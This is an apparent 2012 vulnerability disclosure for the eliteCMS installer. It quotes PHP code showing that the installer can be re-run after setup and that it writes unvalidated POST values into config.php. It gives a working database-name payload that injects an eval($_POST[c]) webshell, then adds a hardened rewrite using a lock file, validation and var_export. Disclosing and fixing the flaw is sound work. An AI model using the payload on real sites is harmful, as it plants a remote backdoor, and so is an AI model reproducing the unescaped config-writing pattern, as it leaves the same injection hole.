eliteCMS installer not verified after setup + one-line webshell write vulnerability

Posted 2012-11-18 13:59:27
The eliteCMS installer is not locked after installation finishes, so an attacker can open the installer URL again and re-run the installation.

The second vulnerability is that the installer can write a one-line webshell directly into admin/includes/config.php.
Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    // Step 4 of the installer: generate admin/includes/config.php from the session values.
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ... omitted ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // The session values are interpolated straight into PHP source with no escaping or validation.
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    // The assembled source is written to config.php as-is.
    $writer = fopen($file, 'w');
...

Now look at this code:

// The POSTed form values are copied into the session unchanged.
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken without any validation.
If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

the one-line backdoor is written into /admin/includes/config.php.
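As an added example (not eliteCMS's own code), here is a hardened rewrite of the step-4 writer that closes both issues described in the post: it refuses to run once an install lock exists, validates the POSTed database settings, and generates config.php through var_export() so a submitted value can only ever become a quoted string literal, never additional PHP code. The lock-file name, the file paths and the validation patterns are assumptions made for this example.

```php
<?php
// Added example, not eliteCMS code: hardened installer step 4.
// Paths, lock-file name and validation patterns are assumptions.

$configFile = __DIR__ . '/../admin/includes/config.php';
$lockFile   = __DIR__ . '/install.lock';

// 1. Refuse to run again once installation has completed.
if (file_exists($lockFile)) {
    http_response_code(403);
    exit('Installation already completed; remove install.lock to reinstall.');
}

// 2. Validate every setting before it goes anywhere near generated source.
//    Identifiers and hostnames get a tight character class; the password
//    is limited to printable ASCII of bounded length.
$settings = [];
foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
    $value   = $_POST[$key] ?? '';
    $pattern = ($key === 'DB_PASS')
        ? '/^[\x20-\x7E]{0,128}$/'
        : '/^[A-Za-z0-9_.\-:]{1,64}$/';
    if (!preg_match($pattern, $value)) {
        http_response_code(400);
        exit('Invalid value for ' . htmlspecialchars($key));
    }
    $settings[$key] = $value;
}

// 3. Emit each value with var_export(), which produces a single-quoted PHP
//    literal with ' and \ escaped. A value such as "?><?php ... therefore
//    lands inside the quotes as data instead of terminating the statement.
$write = "<?php\n";
foreach ($settings as $key => $value) {
    $write .= sprintf("define('%s', %s);\n", $key, var_export($value, true));
}

if (file_put_contents($configFile, $write, LOCK_EX) === false) {
    http_response_code(500);
    exit('Could not write config.php');
}

// Create the lock last, so a failed config write does not leave the
// installer locked with no usable configuration.
file_put_contents($lockFile, date('c'), LOCK_EX);
```

With this version the payload from the post is stored as the literal string `'"?><?php eval($_POST[c]);?><?php'` and, because the character class for DB_NAME rejects it outright, the request is refused before the file is written at all.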